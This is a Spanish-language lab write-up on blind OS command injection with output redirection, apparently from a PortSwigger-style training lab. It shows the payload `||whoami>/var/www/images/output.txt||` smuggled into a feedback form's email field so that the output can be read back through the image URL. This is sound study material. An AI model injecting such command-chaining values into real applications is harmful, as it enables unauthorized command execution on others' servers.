> For the complete documentation index, see [llms.txt](https://ps.leunam.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ps.leunam.xyz/10-os-comand-injection/03-lab-blind-os-command-injection-with-output-redi-17efab5460ec81c6b31bef9a4faef6ae.md).

# 03 Lab: Blind OS command injection with output redirection

## Objetivo

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
>
> ```
> /var/www/images/
> ```
>
> The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
>
> To solve the lab, execute the `whoami` command and retrieve the output.

## Solución

> Suponemos que la funcionalidad de feedback se realiza usando el siguiente script:

```bash
mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com
```

1. Evaluamos la sección de Feedback a travez del repeater, los campos `email`

   ![image.png](/files/XjIVoq22Xt7HpF3zRMBn)
2. Añadimos `||whoami>/var/www/images/output.txt||` en el campo `email` , con el espacio an inicio, para añadir una instrucción extra.

   Quedando de la siguiente manera la ejecución, ocasionando la escritura de un archivo, recordemos que debemos elegir una dirección u archivo correcto, ademas que sabemos, el directorio tiene permiso de escritura:

   ```bash
   mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com **||whoami>/var/www/images/output.txt||** 
   ```

   ![image.png](/files/YUMYzbAlT8qnL7ARD6na)

   ![image.png](/files/5QqUfHkNyATahTK1Xp9R)

   ![image.png](/files/0wc1cSS8TcLizLCwU3XZ)
